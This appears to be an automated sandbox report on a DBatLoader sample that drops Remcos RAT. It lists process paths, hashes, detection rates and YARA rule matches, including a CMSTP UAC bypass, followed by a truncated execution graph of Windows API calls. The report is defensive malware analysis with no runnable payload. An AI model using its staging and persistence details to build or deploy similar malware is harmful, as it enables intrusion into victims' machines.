                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:8
                                                                                      Start time:10:59:13
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\Xjfxsfmn.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Xjfxsfmn.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'639'424 bytes
                                                                                      MD5 hash:2CC30D206669699E58870623365FEF82
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000008.00000002.2296612772.0000000002D91000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                      • Detection: 63%, ReversingLabs
                                                                                      • Detection: 66%, Virustotal, Browse
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:10
                                                                                      Start time:10:59:17
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000000A.00000001.2293209618.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:11
                                                                                      Start time:10:59:18
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Antivirus matches:
                                                                                      • Detection: 3%, ReversingLabs
                                                                                      • Detection: 0%, Virustotal, Browse
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:12
                                                                                      Start time:10:59:21
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\ProgramData\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:13
                                                                                      Start time:10:59:29
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\ProgramData\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\ProgramData\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:15
                                                                                      Start time:10:59:40
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\Xjfxsfmn.PIF
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Libraries\Xjfxsfmn.PIF"
                                                                                      Imagebase:0x400000
                                                                                      File size:1'639'424 bytes
                                                                                      MD5 hash:2CC30D206669699E58870623365FEF82
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:Borland Delphi
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000F.00000002.2561591986.0000000002E21000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:16
                                                                                      Start time:10:59:43
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Libraries\nmfsxfjX.pif
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000010.00000001.2559054856.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000AC0000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000010.00000001.2559054856.0000000000490000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:17
                                                                                      Start time:10:59:44
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      General

                                                                                      Target ID:18
                                                                                      Start time:10:59:49
                                                                                      Start date:24/04/2024
                                                                                      Path:C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Remcos\remcos.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:68'096 bytes
                                                                                      MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Disassembly

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:15.7%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:80.2%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:28
                                                                                        execution_graph 33111 2d84efe 33838 2d64824 33111->33838 33839 2d64835 33838->33839 33840 2d64872 33839->33840 33841 2d6485b 33839->33841 33856 2d64564 33840->33856 33847 2d64b90 33841->33847 33844 2d64868 33845 2d648a3 33844->33845 33861 2d644f4 33844->33861 33850 2d64b9d 33847->33850 33855 2d64bcd 33847->33855 33849 2d64bc6 33852 2d64564 11 API calls 33849->33852 33850->33849 33851 2d64ba9 33850->33851 33867 2d62c44 11 API calls 33851->33867 33852->33855 33853 2d64bb7 33853->33844 33868 2d644a0 33855->33868 33857 2d6458c 33856->33857 33858 2d64568 33856->33858 33857->33844 33881 2d62c10 33858->33881 33860 2d64575 33860->33844 33862 2d644f8 33861->33862 33864 2d64508 33861->33864 33862->33864 33865 2d64564 11 API calls 33862->33865 33863 2d64536 33863->33845 33864->33863 33866 2d62c2c 11 API calls 33864->33866 33865->33864 33866->33863 33867->33853 33869 2d644a6 33868->33869 33871 2d644c1 33868->33871 33869->33871 33872 2d62c2c 33869->33872 33871->33853 33873 2d62c3a 33872->33873 33874 2d62c30 33872->33874 33873->33871 33874->33873 33875 2d62d19 33874->33875 33879 2d664e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33874->33879 33880 2d62ce8 7 API calls 33875->33880 33878 2d62d3a 33878->33871 33879->33875 33880->33878 33882 2d62c14 33881->33882 33882->33860 33883 2d62d19 33882->33883 33884 2d62c1e 33882->33884 33888 2d664e4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33882->33888 33889 2d62ce8 7 API calls 33883->33889 33884->33860 33887 2d62d3a 33887->33860 33888->33883 33889->33887 33890 2d64ea0 33891 2d64ead 33890->33891 33895 2d64eb4 33890->33895 33899 2d64bf4 SysAllocStringLen 33891->33899 33896 2d64c14 33895->33896 33897 2d64c20 33896->33897 33898 2d64c1a SysFreeString 33896->33898 33898->33897 33899->33895 33900 2d64c60 33901 2d64c87 33900->33901 33902 2d64c64 33900->33902 33903 2d64c24 33902->33903 33904 2d64c77 SysReAllocStringLen 33902->33904 33905 2d64c2a SysFreeString 33903->33905 33906 2d64c38 33903->33906 33904->33901 33907 2d64bf4 33904->33907 33905->33906 33908 2d64c10 33907->33908 33909 2d64c00 SysAllocStringLen 33907->33909 33909->33907 33909->33908 33910 2d81ac0 33911 2d64824 11 API calls 33910->33911 33912 2d81ae1 33911->33912 33913 2d81aec 33912->33913 33914 2d81af9 33913->33914 35340 2d647b0 33914->35340 33916 2d81b18 33917 2d81b23 33916->33917 33918 2d81b30 33917->33918 35355 2d77be8 33918->35355 33921 2d64824 11 API calls 33922 2d81b5d 33921->33922 33923 2d81b68 33922->33923 33924 2d647b0 11 API calls 33923->33924 33925 2d81b94 33924->33925 33926 2d81b9f 33925->33926 33927 2d81bac 33926->33927 33928 2d77be8 17 API calls 33927->33928 33929 2d81bb8 33928->33929 33930 2d64824 11 API calls 33929->33930 33931 2d81c37 33930->33931 33932 2d81c42 33931->33932 33933 2d81c4e 33932->33933 33934 2d64824 11 API calls 33933->33934 33935 2d81c6f 33934->33935 35364 2d64964 33935->35364 35341 2d647b4 35340->35341 35342 2d64815 35340->35342 35343 2d644f4 35341->35343 35344 2d647bc 35341->35344 35349 2d64564 11 API calls 35343->35349 35350 2d64508 35343->35350 35344->35342 35346 2d647cb 35344->35346 35348 2d644f4 11 API calls 35344->35348 35345 2d64536 35345->33916 35347 2d64564 11 API calls 35346->35347 35352 2d647e5 35347->35352 35348->35346 35349->35350 35350->35345 35351 2d62c2c 11 API calls 35350->35351 35351->35345 35353 2d644f4 11 API calls 35352->35353 35354 2d64811 35353->35354 35354->33916 35356 2d77bfd 35355->35356 35357 2d77c05 LoadLibraryW GetModuleHandleW 35356->35357 35358 2d64964 35357->35358 35359 2d77c30 GetProcAddress 35358->35359 35368 2d77b20 35359->35368 35361 2d77c57 35377 2d644c4 35361->35377 35365 2d64968 35364->35365 35366 2d64698 35365->35366 35367 2d6469e 35366->35367 35381 2d64538 35368->35381 35371 2d647b0 11 API calls 35372 2d77b53 35371->35372 35373 2d77b5b GetModuleHandleA GetProcAddress VirtualProtect 35372->35373 35374 2d77b97 35373->35374 35375 2d644c4 11 API calls 35374->35375 35376 2d77ba4 35375->35376 35376->35361 35379 2d644ca 35377->35379 35378 2d644f0 35378->33921 35379->35378 35380 2d62c2c 11 API calls 35379->35380 35380->35379 35383 2d6453c 35381->35383 35382 2d64560 35382->35371 35383->35382 35384 2d62c2c 11 API calls 35383->35384 35384->35382 35385 2d89b30 35388 2d7d5d0 35385->35388 35387 2d89b38 35389 2d7d5d8 35388->35389 35389->35389 37907 2d62ee0 QueryPerformanceCounter 35389->37907 35391 2d7d5f9 35392 2d7d603 InetIsOffline 35391->35392 35393 2d7d61e 35392->35393 35394 2d7d60d 35392->35394 35396 2d644f4 11 API calls 35393->35396 35395 2d644f4 11 API calls 35394->35395 35397 2d7d61c 35395->35397 35398 2d7d62d 35396->35398 35397->35398 35399 2d64824 11 API calls 35398->35399 35400 2d7d64b 35399->35400 35401 2d7d653 35400->35401 35402 2d7d65d 35401->35402 35403 2d647b0 11 API calls 35402->35403 35404 2d7d676 35403->35404 35405 2d7d67e 35404->35405 35406 2d7d688 35405->35406 35407 2d77be8 17 API calls 35406->35407 35408 2d7d691 35407->35408 35409 2d64824 11 API calls 35408->35409 35410 2d7d6af 35409->35410 35411 2d7d6c1 35410->35411 35412 2d647b0 11 API calls 35411->35412 35413 2d7d6da 35412->35413 35414 2d7d6e2 35413->35414 35415 2d7d6ec 35414->35415 35416 2d77be8 17 API calls 35415->35416 35417 2d7d6f5 35416->35417 35418 2d64824 11 API calls 35417->35418 35419 2d7d713 35418->35419 35420 2d7d725 35419->35420 35421 2d647b0 11 API calls 35420->35421 35422 2d7d73e 35421->35422 35423 2d7d746 35422->35423 35424 2d7d750 35423->35424 35425 2d77be8 17 API calls 35424->35425 35426 2d7d759 35425->35426 35427 2d64824 11 API calls 35426->35427 35428 2d7d777 35427->35428 35429 2d7d77f 35428->35429 35430 2d7d789 35429->35430 35431 2d647b0 11 API calls 35430->35431 35432 2d7d7a2 35431->35432 35433 2d64964 35432->35433 35434 2d7d7aa 35433->35434 35435 2d7d7b4 35434->35435 35436 2d77be8 17 API calls 35435->35436 35437 2d7d7bd 35436->35437 35438 2d64824 11 API calls 35437->35438 35439 2d7d7db 35438->35439 35440 2d7d7e3 35439->35440 35441 2d7d7ed 35440->35441 35442 2d647b0 11 API calls 35441->35442 35443 2d7d806 35442->35443 35444 2d7d80e 35443->35444 35445 2d7d818 35444->35445 35446 2d77be8 17 API calls 35445->35446 35447 2d7d821 35446->35447 35448 2d7d82e 35447->35448 35449 2d7d83f 35448->35449 35450 2d77be8 17 API calls 35449->35450 35451 2d7d848 35450->35451 35452 2d7d855 35451->35452 35453 2d77be8 17 API calls 35452->35453 35454 2d7d86f 35453->35454 35455 2d7d87c 35454->35455 35456 2d7d88d 35455->35456 35457 2d77be8 17 API calls 35456->35457 35458 2d7d896 35457->35458 35459 2d64824 11 API calls 35458->35459 35460 2d7d8b4 35459->35460 35461 2d7d8bc 35460->35461 35462 2d7d8c6 35461->35462 35463 2d647b0 11 API calls 35462->35463 35464 2d7d8df 35463->35464 35465 2d7d8e7 35464->35465 35466 2d7d8f1 35465->35466 35467 2d77be8 17 API calls 35466->35467 35468 2d7d8fa 35467->35468 35469 2d7d907 35468->35469 35470 2d7d918 35469->35470 35471 2d77be8 17 API calls 35470->35471 35472 2d7d921 35471->35472 35473 2d64698 35472->35473 35474 2d7d948 35473->35474 35475 2d77be8 17 API calls 35474->35475 35476 2d7d954 35475->35476 35477 2d7d964 35476->35477 35478 2d64698 35477->35478 35479 2d7d97b 35478->35479 35480 2d77be8 17 API calls 35479->35480 35481 2d7d987 35480->35481 35482 2d64824 11 API calls 35481->35482 35483 2d7d9a8 35482->35483 35484 2d64698 35483->35484 35485 2d7d9c0 35484->35485 35486 2d647b0 11 API calls 35485->35486 35487 2d7d9df 35486->35487 35488 2d7d9f7 35487->35488 35489 2d77be8 17 API calls 35488->35489 35490 2d7da03 35489->35490 35491 2d64824 11 API calls 35490->35491 35492 2d7da24 35491->35492 35493 2d647b0 11 API calls 35492->35493 35494 2d7da5b 35493->35494 35495 2d77be8 17 API calls 35494->35495 35496 2d7da7f 35495->35496 35497 2d7da8f 35496->35497 35498 2d77be8 17 API calls 35497->35498 35499 2d7dab2 35498->35499 35500 2d7dac2 35499->35500 35501 2d77be8 17 API calls 35500->35501 35502 2d7dae5 35501->35502 35503 2d7daf5 35502->35503 35504 2d7db0c 35503->35504 35505 2d77be8 17 API calls 35504->35505 35506 2d7db18 35505->35506 35507 2d64824 11 API calls 35506->35507 35508 2d7db39 35507->35508 35509 2d7db44 35508->35509 35510 2d647b0 11 API calls 35509->35510 35511 2d7db70 35510->35511 35512 2d7db7b 35511->35512 35513 2d7db88 35512->35513 35514 2d77be8 17 API calls 35513->35514 35515 2d7db94 35514->35515 35516 2d64698 35515->35516 35517 2d7dba4 35516->35517 35518 2d7dbbb 35517->35518 35519 2d77be8 17 API calls 35518->35519 35520 2d7dbc7 35519->35520 35521 2d7dbd7 35520->35521 35522 2d7dbee 35521->35522 35523 2d77be8 17 API calls 35522->35523 35524 2d7dbfa 35523->35524 35525 2d7dc0a 35524->35525 35526 2d7dc21 35525->35526 35527 2d77be8 17 API calls 35526->35527 35528 2d7dc2d 35527->35528 35529 2d64824 11 API calls 35528->35529 35530 2d7dc4e 35529->35530 35531 2d7dc66 35530->35531 35532 2d647b0 11 API calls 35531->35532 35533 2d7dc85 35532->35533 35534 2d7dc9d 35533->35534 35535 2d77be8 17 API calls 35534->35535 35536 2d7dca9 35535->35536 35537 2d64824 11 API calls 35536->35537 35538 2d7dcca 35537->35538 35539 2d7dce2 35538->35539 35540 2d647b0 11 API calls 35539->35540 35541 2d7dd01 35540->35541 35542 2d7dd19 35541->35542 35543 2d77be8 17 API calls 35542->35543 35544 2d7dd25 35543->35544 35545 2d77be8 17 API calls 35544->35545 35546 2d7dd58 35545->35546 35547 2d77be8 17 API calls 35546->35547 35548 2d7dd8b 35547->35548 35549 2d7dd9b 35548->35549 35550 2d77be8 17 API calls 35549->35550 35551 2d7ddbe 35550->35551 35552 2d64824 11 API calls 35551->35552 35553 2d7dddf 35552->35553 35554 2d647b0 11 API calls 35553->35554 35555 2d7de16 35554->35555 35556 2d7de21 35555->35556 35557 2d77be8 17 API calls 35556->35557 35558 2d7de3a 35557->35558 35559 2d64824 11 API calls 35558->35559 35560 2d7de5b 35559->35560 35561 2d647b0 11 API calls 35560->35561 35562 2d7de92 35561->35562 35563 2d77be8 17 API calls 35562->35563 35564 2d7deb6 35563->35564 35565 2d64824 11 API calls 35564->35565 35566 2d7ded7 35565->35566 35567 2d7deef 35566->35567 35568 2d647b0 11 API calls 35567->35568 35569 2d7df0e 35568->35569 35570 2d7df26 35569->35570 35571 2d77be8 17 API calls 35570->35571 35572 2d7df32 35571->35572 35573 2d64824 11 API calls 35572->35573 35574 2d7df53 35573->35574 35575 2d7df6b 35574->35575 35576 2d647b0 11 API calls 35575->35576 35577 2d7df8a 35576->35577 35578 2d7dfa2 35577->35578 35579 2d77be8 17 API calls 35578->35579 35580 2d7dfae 35579->35580 35581 2d7dfd5 35580->35581 35582 2d64824 11 API calls 35581->35582 35583 2d7dff6 35582->35583 35584 2d7e00e 35583->35584 35585 2d647b0 11 API calls 35584->35585 35586 2d7e02d 35585->35586 35587 2d77be8 17 API calls 35586->35587 35588 2d7e051 35587->35588 35589 2d64824 11 API calls 35588->35589 35590 2d7e072 35589->35590 35591 2d7e08a 35590->35591 35592 2d647b0 11 API calls 35591->35592 35593 2d7e0a9 35592->35593 35594 2d77be8 17 API calls 35593->35594 35595 2d7e0cd 35594->35595 35596 2d647b0 11 API calls 35595->35596 35597 2d7e0e3 35596->35597 37910 2d67e18 35597->37910 35600 2d7e0f6 35603 2d64824 11 API calls 35600->35603 35601 2d7e203 35602 2d64824 11 API calls 35601->35602 35604 2d7e224 35602->35604 35605 2d7e117 35603->35605 35606 2d7e22f 35604->35606 35607 2d7e122 35605->35607 35608 2d7e23c 35606->35608 35609 2d7e12f 35607->35609 35610 2d647b0 11 API calls 35608->35610 35611 2d647b0 11 API calls 35609->35611 35612 2d7e25b 35610->35612 35613 2d7e14e 35611->35613 35614 2d7e266 35612->35614 35615 2d7e159 35613->35615 35616 2d7e273 35614->35616 35617 2d7e166 35615->35617 35618 2d77be8 17 API calls 35616->35618 35619 2d77be8 17 API calls 35617->35619 35621 2d7e27f 35618->35621 35620 2d7e172 35619->35620 35623 2d64824 11 API calls 35620->35623 35622 2d64824 11 API calls 35621->35622 35624 2d7e2a0 35622->35624 35625 2d7e193 35623->35625 35626 2d7e2ab 35624->35626 35627 2d7e19e 35625->35627 35628 2d7e2b8 35626->35628 35629 2d7e1ab 35627->35629 35630 2d647b0 11 API calls 35628->35630 35631 2d647b0 11 API calls 35629->35631 35632 2d7e2d7 35630->35632 35633 2d7e1ca 35631->35633 35634 2d7e2e2 35632->35634 35635 2d7e1d5 35633->35635 35636 2d7e2ef 35634->35636 35637 2d7e1e2 35635->35637 35638 2d77be8 17 API calls 35636->35638 35639 2d77be8 17 API calls 35637->35639 35640 2d7e2fb 35638->35640 35641 2d7e1ee 35639->35641 35642 2d644f4 11 API calls 35640->35642 35643 2d644f4 11 API calls 35641->35643 35644 2d7e1fe 35642->35644 35643->35644 35645 2d64824 11 API calls 35644->35645 35646 2d7e32b 35645->35646 35647 2d7e336 35646->35647 35648 2d647b0 11 API calls 35647->35648 35649 2d7e362 35648->35649 35650 2d7e36d 35649->35650 35651 2d77be8 17 API calls 35650->35651 35652 2d7e386 35651->35652 35653 2d64824 11 API calls 35652->35653 35654 2d7e3a7 35653->35654 35655 2d7e3b2 35654->35655 35656 2d7e3bf 35655->35656 35657 2d647b0 11 API calls 35656->35657 35658 2d7e3de 35657->35658 35659 2d7e3e9 35658->35659 35660 2d77be8 17 API calls 35659->35660 35661 2d7e402 35660->35661 37914 2d6c320 GetModuleFileNameA 35661->37914 35664 2d644f4 11 API calls 35665 2d7e41f 35664->35665 37917 2d649c4 35665->37917 35669 2d64824 11 API calls 35670 2d7e473 35669->35670 35671 2d7e48b 35670->35671 35672 2d647b0 11 API calls 35671->35672 35673 2d7e4aa 35672->35673 35674 2d64698 35673->35674 35675 2d7e4c2 35674->35675 35676 2d77be8 17 API calls 35675->35676 35677 2d7e4ce 35676->35677 35678 2d64824 11 API calls 35677->35678 35679 2d7e4ef 35678->35679 35680 2d7e507 35679->35680 35681 2d647b0 11 API calls 35680->35681 35682 2d7e526 35681->35682 35683 2d64698 35682->35683 35684 2d7e53e 35683->35684 35685 2d77be8 17 API calls 35684->35685 35686 2d7e54a 35685->35686 35687 2d64824 11 API calls 35686->35687 35688 2d7e56b 35687->35688 35689 2d7e576 35688->35689 35690 2d7e583 35689->35690 35691 2d647b0 11 API calls 35690->35691 35692 2d7e5a2 35691->35692 35693 2d64698 35692->35693 35694 2d7e5ba 35693->35694 35695 2d77be8 17 API calls 35694->35695 35696 2d7e5c6 35695->35696 35697 2d64824 11 API calls 35696->35697 35698 2d7e5e7 35697->35698 35699 2d7e5f2 35698->35699 35700 2d7e5ff 35699->35700 35701 2d647b0 11 API calls 35700->35701 35702 2d7e61e 35701->35702 35703 2d64698 35702->35703 35704 2d7e636 35703->35704 35705 2d77be8 17 API calls 35704->35705 35706 2d7e642 35705->35706 35707 2d644f4 11 API calls 35706->35707 35708 2d7e651 35707->35708 35709 2d64824 11 API calls 35708->35709 35710 2d7e672 35709->35710 35711 2d7e67d 35710->35711 35712 2d7e68a 35711->35712 35713 2d647b0 11 API calls 35712->35713 35714 2d7e6a9 35713->35714 35715 2d64964 35714->35715 35716 2d7e6b4 35715->35716 35717 2d7e6c1 35716->35717 35718 2d77be8 17 API calls 35717->35718 35719 2d7e6cd 35718->35719 35720 2d64824 11 API calls 35719->35720 35721 2d7e6ee 35720->35721 35722 2d7e706 35721->35722 35723 2d647b0 11 API calls 35722->35723 35724 2d7e725 35723->35724 35725 2d7e73d 35724->35725 35726 2d77be8 17 API calls 35725->35726 35727 2d7e749 35726->35727 35728 2d64824 11 API calls 35727->35728 35729 2d7e76a 35728->35729 35730 2d64964 35729->35730 35731 2d7e775 35730->35731 35732 2d64698 35731->35732 35733 2d7e782 35732->35733 35734 2d647b0 11 API calls 35733->35734 35735 2d7e7a1 35734->35735 35736 2d7e7ac 35735->35736 35737 2d64698 35736->35737 35738 2d7e7b9 35737->35738 35739 2d77be8 17 API calls 35738->35739 35740 2d7e7c5 35739->35740 35741 2d64964 35740->35741 35742 2d7e7cf 35741->35742 35743 2d7e7dc 35742->35743 35744 2d67e18 GetFileAttributesA 35743->35744 35745 2d7e7e7 35744->35745 35746 2d7e7ef 35745->35746 35747 2d7efab 35745->35747 35749 2d64824 11 API calls 35746->35749 35748 2d64824 11 API calls 35747->35748 35751 2d7efcc 35748->35751 35750 2d7e810 35749->35750 35752 2d64964 35750->35752 35754 2d7efd7 35751->35754 35753 2d7e81b 35752->35753 35755 2d64698 35753->35755 35756 2d7efe4 35754->35756 35757 2d7e828 35755->35757 35758 2d647b0 11 API calls 35756->35758 35759 2d647b0 11 API calls 35757->35759 35760 2d7f003 35758->35760 35761 2d7e847 35759->35761 35762 2d64964 35760->35762 35763 2d64964 35761->35763 35764 2d7f00e 35762->35764 35765 2d7e852 35763->35765 35766 2d77be8 17 API calls 35764->35766 35767 2d77be8 17 API calls 35765->35767 35768 2d7f027 35766->35768 35769 2d7e86b 35767->35769 35770 2d64824 11 API calls 35768->35770 35771 2d64824 11 API calls 35769->35771 35772 2d7f048 35770->35772 35773 2d7e88c 35771->35773 35774 2d7f053 35772->35774 35775 2d64964 35773->35775 35779 2d7f060 35774->35779 35776 2d7e897 35775->35776 35777 2d64698 35776->35777 35778 2d7e8a4 35777->35778 35780 2d647b0 11 API calls 35778->35780 35781 2d647b0 11 API calls 35779->35781 35783 2d7e8c3 35780->35783 35782 2d7f07f 35781->35782 35784 2d64964 35782->35784 35785 2d64964 35783->35785 35786 2d7f08a 35784->35786 35787 2d7e8ce 35785->35787 35788 2d64698 35786->35788 35789 2d64698 35787->35789 35790 2d7f097 35788->35790 35791 2d7e8db 35789->35791 35792 2d77be8 17 API calls 35790->35792 35793 2d77be8 17 API calls 35791->35793 35794 2d7f0a3 35792->35794 35795 2d7e8e7 35793->35795 35796 2d64824 11 API calls 35794->35796 35797 2d64824 11 API calls 35795->35797 35798 2d7f0c4 35796->35798 35799 2d7e908 35797->35799 35802 2d64698 35798->35802 35800 2d64964 35799->35800 35801 2d7e913 35800->35801 35803 2d64698 